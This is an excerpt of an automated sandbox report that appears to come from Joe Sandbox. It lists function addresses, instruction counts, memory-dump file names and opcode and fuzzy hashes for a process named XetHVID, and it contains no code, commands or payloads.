                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f1fcfc0c8f1d46f10280387b4e7f14bab6c0f44841295c7f880fbccc533cff5
                                                                  • Instruction ID: 681cfc25f1d4ff93345715ea5bc2ffd867652ceb353c527e063f48ccc185dca9
                                                                  • Opcode Fuzzy Hash: 0f1fcfc0c8f1d46f10280387b4e7f14bab6c0f44841295c7f880fbccc533cff5
                                                                  • Instruction Fuzzy Hash: 2BF0C272A00246ABDB49AB78C1213ED7BF2DFC4711F50086EC142AB381CFB50E0687E6
                                                                  Function 08CF11A7 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf90e501cc7c059a3a57ee03f0dea30103d8abce71a48e0e0e43a7de001366cc
                                                                  • Instruction ID: 07aa87acb2b52733e10fbf9d904998f9318c8893c8cdc29acfef8730e3023b29
                                                                  • Opcode Fuzzy Hash: cf90e501cc7c059a3a57ee03f0dea30103d8abce71a48e0e0e43a7de001366cc
                                                                  • Instruction Fuzzy Hash: 8DF08178A0111ADBCB01DBA8E6416ADB7F4EB44345F6046A6E419A7341D6306E06CB51
                                                                  Function 08CF9790 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 845729b7362b383653b0a2ffbaaae19d281189dd7405b8b2ce563f39d6c5d0ff
                                                                  • Instruction ID: 45ac880545b64b7f9d63feecf7319447bc218c861c14092147aa82314d43f897
                                                                  • Opcode Fuzzy Hash: 845729b7362b383653b0a2ffbaaae19d281189dd7405b8b2ce563f39d6c5d0ff
                                                                  • Instruction Fuzzy Hash: 4DF0F631A0020AEBD748BA69C1503AE76F6DFC4711F90083ED502AB781CFB55D0587E6
                                                                  Function 0563A440 Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d466e75d3785c9815b48c9071176fbf57ae7ec027e8748a17cd38a15f58335f5
                                                                  • Instruction ID: e90278f4d67a58b01a035ccfe3b8a9bf4a81a4ea1e09328802696ee9398776fd
                                                                  • Opcode Fuzzy Hash: d466e75d3785c9815b48c9071176fbf57ae7ec027e8748a17cd38a15f58335f5
                                                                  • Instruction Fuzzy Hash: 4CF09632A041255BD714DF95D84597FF7EBFFC4624F15813AE01997740DA359842C3D4
                                                                  Function 08CFEF80 Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52f9a5cc51f68b3ea5ddc36d4f1fb732fb7e05cc72c142b085ad64732d44535c
                                                                  • Instruction ID: cbe1a388587ef77b3647118fcb307799b604f494f630f0c2bdfab608f028b71f
                                                                  • Opcode Fuzzy Hash: 52f9a5cc51f68b3ea5ddc36d4f1fb732fb7e05cc72c142b085ad64732d44535c
                                                                  • Instruction Fuzzy Hash: 16F05E363245508FD755DB2DD844D9977F9AF8AA2231A00FAE20ACF372DA20DD02C750
                                                                  Function 073C4DE0 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6115f608fff96492fa0cd437b643b11fda8c547bafcde80b14426512d73ce510
                                                                  • Instruction ID: d9c9da74a9dd8473df11f141639c7d173bdf5c602a57f5bc812376cf5ad7b4e3
                                                                  • Opcode Fuzzy Hash: 6115f608fff96492fa0cd437b643b11fda8c547bafcde80b14426512d73ce510
                                                                  • Instruction Fuzzy Hash: 0AF01235711219AF9B055F99D84586EBFAAFB8C6207108027FD15C3350DF718C219B90
                                                                  Function 00D8D76C Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722045691.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d8d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b40cc05e36136f6f7753f49f7779c989e20271c18a08695c3a882d5211a070c7
                                                                  • Instruction ID: 0412aa90ff4504386cfa2a364f9c88fc0425327edfd1eddca33e8275fdad11a7
                                                                  • Opcode Fuzzy Hash: b40cc05e36136f6f7753f49f7779c989e20271c18a08695c3a882d5211a070c7
                                                                  • Instruction Fuzzy Hash: 8BF0C231008344AEE7109A05DC84B62FF98EB51734F18C45AED094A2C6C3789C44CBB1
                                                                  Function 08CFE2D0 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a12b935d3654fbb66ed248f342b34e733e67eedce30d15fcce0b8323529a87a5
                                                                  • Instruction ID: 264bfc76d8f0752074db82f7097837d7eee87777fa5f01483988e8a9de1ad2a5
                                                                  • Opcode Fuzzy Hash: a12b935d3654fbb66ed248f342b34e733e67eedce30d15fcce0b8323529a87a5
                                                                  • Instruction Fuzzy Hash: 8BF030353105104FC644976DC458A6E73EADFC9611B1440BAE609CB371CEB0DC0287A0
                                                                  Function 073CA2D0 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a913e83720b763c1f2f6485db0bef760a404fdaedb7b936f690daceac002d19c
                                                                  • Instruction ID: f27bb3d4bda82bab4f49fdb3ada622b460e32461680b739eb6e6f775283d366f
                                                                  • Opcode Fuzzy Hash: a913e83720b763c1f2f6485db0bef760a404fdaedb7b936f690daceac002d19c
                                                                  • Instruction Fuzzy Hash: F7F082B2604108BFEF18DF64EC559EE7FAADF44260F1481ABE40CDB220E631ED908795
                                                                  Function 08CFE2CE Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1aabfbcf9ad6f0bc5c0ce69f038b69de148fa270016afe6faac619e00a8d1ed0
                                                                  • Instruction ID: 74c25cfc78d01a63e44306871f06561199a9c543a70462a22bb77fb826d25dde
                                                                  • Opcode Fuzzy Hash: 1aabfbcf9ad6f0bc5c0ce69f038b69de148fa270016afe6faac619e00a8d1ed0
                                                                  • Instruction Fuzzy Hash: 9EF0DA397105108FC6549B6CD85CA6E73EAEFC9615B1980BAE60ADB371DEB0DC0687A0
                                                                  Function 073C2AC7 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 073f5e8c183e7600448438f8c3cc6e0ce0b1b3e70cdeabe295f11fe5cd0d8d4c
                                                                  • Instruction ID: 6f755891b0b6775028c06c1e4e22367394ac8b5f7d3dd5b492fb74af1b68a576
                                                                  • Opcode Fuzzy Hash: 073f5e8c183e7600448438f8c3cc6e0ce0b1b3e70cdeabe295f11fe5cd0d8d4c
                                                                  • Instruction Fuzzy Hash: BBF0E2B67083409FE3228E1AE884586FBE4FF99272704C96BE84CC7641DA309805CBA0
                                                                  Function 073CB932 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd3f586980809d16a7a7a96c56679cab5af864787b996b82346f9cd6d28fae
                                                                  • Instruction ID: 1a7bc57cb50428851733e6ff61ac66ffdcfed2ef7c5935b631f7c2f44f8498eb
                                                                  • Opcode Fuzzy Hash: 05dd3f586980809d16a7a7a96c56679cab5af864787b996b82346f9cd6d28fae
                                                                  • Instruction Fuzzy Hash: 92F0BEF2E38108D7EB04D9A8A447279FAAD9B8A212F0004EFA44EE7F50DE611C0447A2
                                                                  Function 073C8F1C Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42cbeaa76cbfe0382f52cc4400a897e3417a26a9b4df6ef3711a3024aaabd5ef
                                                                  • Instruction ID: 30b166d95fb562c7a2f2b5e3084a0be519b874bd90537debae37971237585e33
                                                                  • Opcode Fuzzy Hash: 42cbeaa76cbfe0382f52cc4400a897e3417a26a9b4df6ef3711a3024aaabd5ef
                                                                  • Instruction Fuzzy Hash: E8F0B4E2D6E190CFE310C6A869541F43BADABA7142F5504CFE44FCBE55D5294F408356
                                                                  Function 08CF11F8 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 153eec459ee2411e38c28829df6e6563b1ae4f4ba96a835e8cf2e2dd01b1a68f
                                                                  • Instruction ID: 0671185952f895f6627c2258cc04cd819f5818b752d9dd4d58b60ddd9e08ca33
                                                                  • Opcode Fuzzy Hash: 153eec459ee2411e38c28829df6e6563b1ae4f4ba96a835e8cf2e2dd01b1a68f
                                                                  • Instruction Fuzzy Hash: 6EF0EC30B01209DBDF01DBA9E901BADB7B4EB42365F5042EBA808E3320DB715F01CB90
                                                                  Function 073C20C8 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b67ab2f81aedfc6ab4fc990519245f84585b4df9c78266bdacbcea94acea98af
                                                                  • Instruction ID: 274d4a9cf25ecbf8680b92273ba65c6d488df227705542cf689beea94d7a57b3
                                                                  • Opcode Fuzzy Hash: b67ab2f81aedfc6ab4fc990519245f84585b4df9c78266bdacbcea94acea98af
                                                                  • Instruction Fuzzy Hash: 12E068B78042520FD3124B72AD4A2E23FF5DE46128B0D44A7E045CA282DB28C826CB10
                                                                  Function 073CAEEA Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 707e65b5d29a2ff57df556332a3948622f2f2262fee7e3344d22819e381a9bf0
                                                                  • Instruction ID: 8fa823f2fa3c8899ca95898e2c48d335f9157c6e10161759d59b58aa44c4d1dc
                                                                  • Opcode Fuzzy Hash: 707e65b5d29a2ff57df556332a3948622f2f2262fee7e3344d22819e381a9bf0
                                                                  • Instruction Fuzzy Hash: 17F0B4B0A45345EFEF01DBB4CC5A9ADBB76AF46300F00C156E6266A6D1C7345C15CB51
                                                                  Function 0563B03D Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a01dca7b7a425df6a9219a29298e526850f0e615ca05a183807960048329fe08
                                                                  • Instruction ID: 51371d1cf63e5720266bb3b93e9220ab7038d960234928c781ce77e78e60f8f0
                                                                  • Opcode Fuzzy Hash: a01dca7b7a425df6a9219a29298e526850f0e615ca05a183807960048329fe08
                                                                  • Instruction Fuzzy Hash: 81F0B430A003098FDB18EFB9C45A7AE7BF2EF84310F044468D40196291DF744580CFA4
                                                                  Function 08CFEF90 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da8482a7116df56cc5f91501e01f16538681c7325bbeea458c631b7031fd4c06
                                                                  • Instruction ID: f949b9c227eb8dcfbe0ff3c09c50ded37f80295572729d1302458ce6a218798d
                                                                  • Opcode Fuzzy Hash: da8482a7116df56cc5f91501e01f16538681c7325bbeea458c631b7031fd4c06
                                                                  • Instruction Fuzzy Hash: 16F0ED353604148FC754DB2DD844D5977E9EFC9A6171640BAF20ACB372DE61DC02CB90
                                                                  Function 08CFE278 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e325b71d90af65398f7ffb8b978ab168f4e427fc24515af8d468f32bfb714093
                                                                  • Instruction ID: ca98012937888931984db667e14cbb66088a2a747a5436d167de7ead27ea2bf9
                                                                  • Opcode Fuzzy Hash: e325b71d90af65398f7ffb8b978ab168f4e427fc24515af8d468f32bfb714093
                                                                  • Instruction Fuzzy Hash: 39E09271B006114B9B48FBBEA80086AF7EBEFD8A14304C07ED90DCB665EE709D0686D4
                                                                  Function 08CF9770 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b1eb23425cf552976d8e56780bfe9397799c322afc57ae56ee0309b2bd929db9
                                                                  • Instruction ID: 0af200ad2614e134a20edff06946eb041647ace4c0a1b2b6647124a88aa8d382
                                                                  • Opcode Fuzzy Hash: b1eb23425cf552976d8e56780bfe9397799c322afc57ae56ee0309b2bd929db9
                                                                  • Instruction Fuzzy Hash: 42F0A034289341DFC34AAB3DC4508267BF5EF5631234588BBE0498B762CA31EC45CB51
                                                                  Function 0563E804 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d4cd9acc66bb917a9a4b052bf75644b4977e83067e7445eb4eb388da8759eb20
                                                                  • Instruction ID: e32637940e960634b6f467d50d913c0b0189dee845d641197e094e3133046f28
                                                                  • Opcode Fuzzy Hash: d4cd9acc66bb917a9a4b052bf75644b4977e83067e7445eb4eb388da8759eb20
                                                                  • Instruction Fuzzy Hash: 15E0DF72B0010567D320655EA446B77FAEEEBC5761F00842AE90CC3740DB259C05C2FA
                                                                  Function 08CF3459 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: daa575a35492424ddb18b4151e430e0e8ce06bcc1c30edab561a6976fce31971
                                                                  • Instruction ID: eb1d989f99ed1b6f451ac6e2581e7ec632de8eaf88da8719d7fe4e755dddc3f3
                                                                  • Opcode Fuzzy Hash: daa575a35492424ddb18b4151e430e0e8ce06bcc1c30edab561a6976fce31971
                                                                  • Instruction Fuzzy Hash: 1AE0D836610345B7EF1116B6DC49B9A7F78EB90272F048035FA01C1701EA75C016C170
                                                                  Function 0563A7A1 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e9a19e9fb1691a14573d4c7b80de93eb087f0763d080a0856e4de0188b1721a
                                                                  • Instruction ID: ec71993afe9f75e22e8313edc370893e4eb85141568ac1b9d02681523c7f9f70
                                                                  • Opcode Fuzzy Hash: 0e9a19e9fb1691a14573d4c7b80de93eb087f0763d080a0856e4de0188b1721a
                                                                  • Instruction Fuzzy Hash: 0DF0A036A101199FCB10EA6DD8495DEBBF5EF84325F004429E549E3744D730AA1ACBC0
                                                                  Function 08CFAAB7 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4aa73b1d5baf977f2cdbc5e0047c7fc2ed537d39e992b38707cc23f1258efe3b
                                                                  • Instruction ID: b386869ef1cd2c0c184bc619022292674f7ee0085f3edb15d8627ce6d41d462f
                                                                  • Opcode Fuzzy Hash: 4aa73b1d5baf977f2cdbc5e0047c7fc2ed537d39e992b38707cc23f1258efe3b
                                                                  • Instruction Fuzzy Hash: 4FE022313053614BDB0A572251105FEBBB19E86182308407FD10BC3292DE204D0B8B91
                                                                  Function 08CFEFD1 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e8dcf7abf244667b26dfc61f52617d093426ee5bdf5e6f5f0312ca292085ed1
                                                                  • Instruction ID: a236912d049ecca64f20a19b05e7f27c0b8077e672afde31fc35f0472d10995e
                                                                  • Opcode Fuzzy Hash: 1e8dcf7abf244667b26dfc61f52617d093426ee5bdf5e6f5f0312ca292085ed1
                                                                  • Instruction Fuzzy Hash: 55E0863714D3504FD6614624F8923C93BE1EF67112B0F85EBD181CB192C41D8D858251
                                                                  Function 0563A7A8 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d008c48dce21754ba9cd3b9fb66d8e48658027c904055375627de22643f53b8
                                                                  • Instruction ID: 69e8464d560e46ad7c62e9ff23cdeb6ebd2ed0dde18e1a1725d6d9c070209366
                                                                  • Opcode Fuzzy Hash: 8d008c48dce21754ba9cd3b9fb66d8e48658027c904055375627de22643f53b8
                                                                  • Instruction Fuzzy Hash: 9FE06D35A106299FCB10EAADE8095DEBBF5FF84325F004529D949E3744DB30AA1ACFD4
                                                                  Function 073CB8E8 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb52753a50dc0cfa79a3dc63b78587c6c32acc5f3b633e405f1406e003902940
                                                                  • Instruction ID: e9db5e0a1bb5d41dace510fa28e5b252310f5887f5016293d0efa1aa25f4f0f8
                                                                  • Opcode Fuzzy Hash: eb52753a50dc0cfa79a3dc63b78587c6c32acc5f3b633e405f1406e003902940
                                                                  • Instruction Fuzzy Hash: 74E092D592C188CBB210D6A47583138AB785B4B221F1444CFD0CED7E02C5255C049723
                                                                  Function 073CC0C8 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a8b37b27a3c587ce198da08396a1e19a04582a0f66d272f90cb715bfb7baef3e
                                                                  • Instruction ID: 37e08c81df863d30f0a2ae427902449c3ca31853bdac1e45b88621c119620129
                                                                  • Opcode Fuzzy Hash: a8b37b27a3c587ce198da08396a1e19a04582a0f66d272f90cb715bfb7baef3e
                                                                  • Instruction Fuzzy Hash: 95E09AF0928628DBF320CA49A91276137EDB746306F1090AEE90ED2E40DA209D4087B3
                                                                  Function 073C9D78 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13c98ee883e31e7a8ada0a1d62a3dfc31ab29b68262563c495be0ee8be13cf27
                                                                  • Instruction ID: 30300fdf1dfcba52f4a0e0a2b16a33fab2b71b349139184a00e2d197e320b9f1
                                                                  • Opcode Fuzzy Hash: 13c98ee883e31e7a8ada0a1d62a3dfc31ab29b68262563c495be0ee8be13cf27
                                                                  • Instruction Fuzzy Hash: 35E012E352C104CAE508E658541D735776E9782311F1340AA900E66E9DDD257C104796
                                                                  Function 08CFB3B9 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12fcb818dcebb615d4d841b07ddd061708fda2bab876ed150bc6fa7a705534a2
                                                                  • Instruction ID: 09e9c0346499f8715fb0052aeb8d0354750e7d7138674b20127ae76fcd845ef8
                                                                  • Opcode Fuzzy Hash: 12fcb818dcebb615d4d841b07ddd061708fda2bab876ed150bc6fa7a705534a2
                                                                  • Instruction Fuzzy Hash: 4CE04FB9546340CFC7599F34D4408563BF2FB5622630689BEC0598B766CA36EC86CB41
                                                                  Function 0563FDDE Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: abc9007fbd4407253ef9c9f601148edf71b981fd2bfbd897e743a1a149887335
                                                                  • Instruction ID: 415d5116474fc63017e70c81f17b3c8203f06643a1c99654ae02b4c330646606
                                                                  • Opcode Fuzzy Hash: abc9007fbd4407253ef9c9f601148edf71b981fd2bfbd897e743a1a149887335
                                                                  • Instruction Fuzzy Hash: 13E01A75D5011DDACB149B91F5197EEFB71FB45316F200412E112B1A90CB390591CB90
                                                                  Function 08CFAAC8 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
